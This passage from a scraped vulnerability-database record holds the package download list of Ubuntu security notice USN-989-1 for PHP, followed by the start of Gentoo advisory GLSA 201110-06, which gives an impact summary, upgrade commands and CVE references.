2464622 72e861a7f64f0816cbeaf1148476f525\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 317372 cfe9e879b144adac2113c9232db770bc\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 24278 516f611a4aa4145a741c0f727d91d989\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 364508 6ec06292057caed29ddeb7b931fa63aa\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 33592 1128a8eb76a4e5c9eca4950aa7c31453\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 14154 542954ae8bd8a6a93f224d7e42a81847\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 17698 78ecbaa90118926dfcf9fea9a9275772\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mhash_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 5062 cfd5a15e67148e0a834b046c092ff2f9\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 63412 82b4091afe904d23c0b09e88d3c33e52\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 32426 5719dad85dce92bccea8d2aaad595e1c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 49696 e680295043b3d7192d44049ca5f10b22\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 8478 9e933d356c40b778e1a5ed395cc622c1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 4742 7f3d3939f9c36aa854a504cc231d23a9\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 11548 02e4a12ceb04e464c9e04b0deb00361e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.4-2ubuntu5.12_sparc.deb\r\n Size/MD5: 32802 1c3ca62abe448c06dc017401b6ec208b\r\n 
Updated packages for Ubuntu 9.04:
Updated packages for Ubuntu 9.10:
http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 33388 b5bcfa2559b467a4aabe6982ae9e2d95\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 50238 936fd084a37bd4ff6cbb5ffdd65fb6a0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 8624 4a0c4b79000a3c2a81629548ec6714ba\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 4838 da0ddd7f1b1331bc535f637d5755428d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 11978 2fda121576ea99b10d3b8db75f6dba5c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 32614 4604ad783d42311d027014e46bab7419\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 24980 857c67ca2718ebad409b82da72b6a642\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 16586 c3408d7a01e71ca520a016fd981102e8\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 34984 82e9a29752fe18f116e158609a3e910c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 12372 ff28e25e311babf6a5995fc1acbc2a08\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.2.10.dfsg.1-2ubuntu6.5_sparc.deb\r\n Size/MD5: 2492420 9c3d3e00f0d3235b7e8fea7445a8b4ff\r\n\r\nUpdated packages for Ubuntu 10.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2-1ubuntu4.5.diff.gz\r\n Size/MD5: 189362 aa33a5f769d54a8d301fc095023fe422\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2-1ubuntu4.5.dsc\r\n Size/MD5: 2531 465758af781eb956c70a009c69570ac2\r\n 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2.orig.tar.gz\r\n Size/MD5: 13734462 4480d7c6d6b4a86de7b8ec8f0c2d1871\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.3.2-1ubuntu4.5_all.deb\r\n Size/MD5: 354420 6ffdc0887531e0cae847a9f601052846\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.3.2-1ubuntu4.5_all.deb\r\n Size/MD5: 1116 b976b1037c96f85f0c2f812978f0781f\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 2987902 87c10d63cefc3b2cd09afb19c4f9a908\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 5804282 d4526a24a661b4b12ae21af04d1ef521\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 2904756 54acd4f66099c0d98f4fcce53bef5c19\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 547646 cb958af661aefe3d2c40b24b2b3a3726\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 27064 3ddc8320466bf1e590c5421e5b2e3e8f\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 10381704 455b2decca8184e3fcf0ab677c03bf32\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 404854 83d7f22822fa11584b1b49b1c4e98de2\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 39006 d7bd335e611856cd54fb31fc67a77a36\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 16494 8e3deb0c5de50492842c14ab5be234cf\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 19904 af5cd748fb0b432af5e2136a2fe55731\r\n 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 73024 470c7b73e256fd700905007c0d403f56\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 35846 8bf763a2b1f09f2af8435ba23642899c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 57258 33e8ecdcdb80dd868bba0dc65335e8ec\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 8176 9ead5cc3fe69e08a0328ad95dde69dd0\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 4380 670b536c8d450bee99725e99d9443251\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 11382 998ed2e50fff0e7aabf1af8afd71e82c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 55294 a04244cd17c268b6402ea7b6c1cb6ddd\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 26572 58f6ee9aca91446ac62f7326f099001c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 18280 b8d973924d325795d972fa355d1c1c53\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 34800 fec582d9694a7a1de947dae2fefda9b9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 13364 8769f873c77c2836916f02c1982ded46\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 2986954 97266c17ebf6000c272d6756b97de6e7\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 8948 d4da189a14a254a71abd6812ff899399\r\n 
http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_amd64.deb\r\n Size/MD5: 59380 3ebee38d8a75a05d12712d3d60b937c4\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 2833114 b04215051dcadfdc06e2513f70ed433b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 5622834 423197eff8efaa375863ce5535adf560\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 2814840 f82ebe6349a5ebe918723086c1302a7e\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 542322 38602836ba5ac1ca3cabace1ce023941\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 25614 689e85bea98c62173940859c421bc4f7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 10558110 e1e88b747269c57f419b8bc422236ed7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 404856 571a3ad11374230f259c91f6a728fc75\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 34750 a69456405baec0d821d61ab0924bda52\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 14232 cff0b73639ff134e4152b1990fdb40c6\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 17562 6748871e9f5e49bcf3218407dfec0629\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 64222 925151a8a99ec8106b1e27565925c6b9\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 32090 bc74344f2d4b41372d8c27d8fbde5400\r\n 
http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 52002 6ca286ebc084b7cdc3b5a625386514f3\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 7272 0a0d2cee4d82e255244bd10b8fc00830\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 4150 184e379a084bff76e26f49362ab06823\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 10278 5b11ef6ee3ff6f1aab979313ef0d6c79\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 46664 78028a964622b0d4953949d4ee9826e7\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 23642 5c8e1baa246c888d4b3378ee4f0f2680\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 16382 8c495d4d032f7e0425a43b65ea7e3d7b\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 31946 8911b282d36c22d8bb9b28e55217c57c\r\n http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 12344 24302b7d74181d100d8f6a66540175a7\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 2832036 bed542d053ab458ed10932843dcdf0e6\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 7762 85f2943e32dcbfd182117483796dacec\r\n http://security.ubuntu.com/ubuntu/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_i386.deb\r\n Size/MD5: 53716 18c7752cae120985efba2a3ae6a25a66\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 2982464 edf78994dd03526c1b82d74e1f318690\r\n 
http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 5771102 4d2e9891c86b28d690fe91a80a99c292\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 2890310 952c32e1fcaa7ef1b5650b2979d699d5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 551158 a88d1105e75195f703a4d483dcebd44e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 28374 554270ce5b80052b9803bcc25571f453\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 11208842 63f87872d09e80692e8251aa4f2df04d\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 404920 e27e87870a2cb324055be1d662ea5b17\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 39870 795c1525e7b307bf6cbe6b3917baf6fe\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 14338 df9d9c09b1069e0f1945ad382eba1f44\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 19164 c885ee0ecf4f52fbbb2cd7bfbf75bcd7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 68998 ce747c080a6824326c060fe14a98248e\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 33942 2474ab65b1f6eac1f919a486cd264f6f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 55474 395e4c0305dacc0aa71db9bc196b2044\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 7488 6444ed22ff69ece5305e96a9927d3420\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 4388 eaf00c1aa48a9053960b1c4797ce9060\r\n 
http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 10736 00aa32b129f319efe56146cfda5e9f5f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 51990 22b99cb703a3f1f4da89eb84aecb6bb6\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 24770 09a88f4f159e5b6856ee751c01b9aadb\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 17836 b64e7de3ec97cb03e39122073eed4d43\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 34088 5396bef4993cfd5de11b870435db88b3\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 13300 89dc76ebac08c9502403d760f95c9e69\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 2981990 a2876e32a2bc43aea98770941e45b66d\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 8300 6dd12260de8c626e34b611b762b04f6c\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_powerpc.deb\r\n Size/MD5: 60434 7b2a0b9d20ade9252980a705daaf47e7\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/p/php5/libapache2-mod-php5_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 2894334 925c72e64cd430b72674a4d7a7e0fbe7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cgi_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 5644716 18b645085fd79b22dd0cd3e259fc033f\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-cli_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 2825874 622bf4dd6249ab27084c14074b07f6e5\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-common_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 546864 48a398ae6e4e6cbec5bb3318a900e99a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-curl_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 27078 
b4aa6fb52c3d12f6205d59acc8bb7df7\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dbg_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 10616814 63490bf4385f5c95ba9c03f26f7d9b1c\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-dev_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 404900 78bc30c48a03521ea6a4840093c7efc1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gd_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 36728 c298bbce65f1a5bf9c42c367ef30a861\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-gmp_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 13432 29d609d21cff39d809a931ebfa39625b\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-ldap_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 17410 3218b21b576e171dc9a6f773b57cc691\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-mysql_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 62090 e7223bbff3572940b60bf7c2eb18f9df\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-odbc_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 30938 d21c73748b899baf596daf0834ebeab4\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pgsql_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 50518 b0d23e8fdce9c786f98db67e43eef1ff\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-pspell_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 7148 458ed08225f5967d3ab4c65f5fad2985\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-recode_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 4144 5fd1ba0857e51bd373ceb95b18f50736\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-snmp_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 10802 1f876015e91d4165f11ff328488f14c1\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sqlite_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 46576 19cc5dc35fb1c3aba75e4dce3c1dbde0\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-sybase_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 22934 8ec1181656a28c7d903649c8773711f4\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-tidy_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 16882 9414b5d7bd0c7bcb46be22b47082563b\r\n 
http://ports.ubuntu.com/pool/main/p/php5/php5-xmlrpc_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 32176 2f63f169a505740fe94d3219421ad24a\r\n http://ports.ubuntu.com/pool/main/p/php5/php5-xsl_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 12110 11304d2ccdfc9d9e1e67b39ab969f436\r\n http://ports.ubuntu.com/pool/universe/p/php5/libapache2-mod-php5filter_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 2893010 b77583cdabf04a58f35b9a45e6effaec\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-enchant_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 7492 8ab97bc42f7cab07f15fa053687b38da\r\n http://ports.ubuntu.com/pool/universe/p/php5/php5-intl_5.3.2-1ubuntu4.5_sparc.deb\r\n Size/MD5: 53994 1b3aa7b8aca7c93f77ce3014440a4bfc\r\n\r\n\r\n", "cvss3": {}, "published": "2010-09-27T00:00:00", "type": "securityvulns", "title": "[USN-989-1] PHP vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-1866", "CVE-2010-2094", "CVE-2010-1130", "CVE-2010-2950", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2010-09-27T00:00:00", "id": "SECURITYVULNS:DOC:24800", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24800", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 201110-06\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: High\r\n Title: PHP: Multiple vulnerabilities\r\n Date: October 10, 2011\r\n Bugs: #306939, #332039, #340807, #350908, #355399, #358791,\r\n #358975, #369071, #372745, #373965, #380261\r\n ID: 201110-06\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - 
- - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nMultiple vulnerabilities were found in PHP, the worst of which leading\r\nto remote execution of arbitrary code.\r\n\r\nBackground\r\n==========\r\n\r\nPHP is a widely-used general-purpose scripting language that is\r\nespecially suited for Web development and can be embedded into HTML.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 dev-lang/php < 5.3.8 >= 5.3.8\r\n\r\nDescription\r\n===========\r\n\r\nMultiple vulnerabilities have been discovered in PHP. Please review the\r\nCVE identifiers referenced below for details.\r\n\r\nImpact\r\n======\r\n\r\nA context-dependent attacker could execute arbitrary code, obtain\r\nsensitive information from process memory, bypass intended access\r\nrestrictions, or cause a Denial of Service in various ways.\r\n\r\nA remote attacker could cause a Denial of Service in various ways,\r\nbypass spam detections, or bypass open_basedir restrictions.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll PHP users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.8"\r\n\r\nReferences\r\n==========\r\n\r\n[ 1 ] CVE-2006-7243\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-7243\r\n[ 2 ] CVE-2009-5016\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5016\r\n[ 3 ] CVE-2010-1128\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1128\r\n[ 4 ] CVE-2010-1129\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1129\r\n[ 5 ] CVE-2010-1130\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1130\r\n[ 6 ] CVE-2010-1860\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1860\r\n[ 7 ] CVE-2010-1861\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1861\r\n[ 8 ] CVE-2010-1862\r\n 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1862\r\n[ 9 ] CVE-2010-1864\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1864\r\n[ 10 ] CVE-2010-1866\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1866\r\n[ 11 ] CVE-2010-1868\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1868\r\n[ 12 ] CVE-2010-1914\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1914\r\n[ 13 ] CVE-2010-1915\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1915\r\n[ 14 ] CVE-2010-1917\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1917\r\n[ 15 ] CVE-2010-2093\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2093\r\n[ 16 ] CVE-2010-2094\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2094\r\n[ 17 ] CVE-2010-2097\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2097\r\n[ 18 ] CVE-2010-2100\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2100\r\n[ 19 ] CVE-2010-2101\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2101\r\n[ 20 ] CVE-2010-2190\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2190\r\n[ 21 ] CVE-2010-2191\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2191\r\n[ 22 ] CVE-2010-2225\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2225\r\n[ 23 ] CVE-2010-2484\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2484\r\n[ 24 ] CVE-2010-2531\r\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2531\r\n[ 25 ] 